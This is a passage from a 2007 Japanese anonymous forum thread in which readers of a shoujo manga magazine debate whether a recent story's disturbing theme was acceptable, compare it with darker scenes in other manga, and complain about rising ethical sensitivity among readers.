まぁそういう問題ではないんだろうけど
柱で作者が言ってる辺り、少なくともララでは
キツイネタだということは自覚してるんだろうな

79 :花と名無しさん:2007/01/24(水) 23:28:25 ID:???0
>>76
知識を与えることが悪いとは思えない
それでそんなことする馬鹿ならどんな情報源だろうが同じだろう

80 :花と名無しさん:2007/01/24(水) 23:35:36 ID:???0
知識云々はおいといて普通につまらんし胸くそ悪いネタだった

81 :花と名無しさん:2007/01/25(木) 00:50:37 ID:???0
胸くそ悪くなる理由がいまいちよく分からないが、
マグロを丸ごと野良猫に食わせるシーンのほうが残酷。
またはBBJの「遺体よ遺体よ飛んでこい!」のほうが凄惨。

82 :花と名無しさん:2007/01/25(木) 00:56:43 ID:???0
確かに・・・今回そんなに批判があったのは不思議だな
つか最近他の漫画でも細かなところで「このシーンは(倫理的に)問題」って
言う人をチラホラ見かける。
王様のいじめネタだとか。

83 :花と名無しさん:2007/01/25(木) 01:04:22 ID:???O
少コミレイプみたく、犯罪を美化・肯定するような内容ならともかく
ちょっと題材にしただけであーだこーだ言う人等も鬱陶しいな。

84 :花と名無しさん:2007/01/25(木) 01:07:05 ID:???0
体罰問題と同じで許容範囲が狭くなってる人がいるのかなぁ

85 :花と名無しさん:2007/01/25(木) 01:07:35 ID:???0
BBJといえば人間が不条理にガンガン死んでたね…
よくララでやってたな

86 :花と名無しさん:2007/01/25(木) 01:08:28 ID:???0
そういえばちょっと叩く程度でも嫌がる人いるねー

87 :花と名無しさん:2007/01/25(木) 01:14:38 ID:PGWzVoGk0
?叩くのと批判が違うってことじゃなくて?

88 :花と名無しさん:2007/01/25(木) 01:20:34 ID:???0
>>87
いや、漫画の中での「叩く」シーンに関してね。
作品叩きとかでなくて

89 :花と名無しさん:2007/01/25(木) 01:56:49 ID:???O
倫理云々を追求していったらいじめ・自殺・殺人が出てくる漫画全てアウトになるぞ

32 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)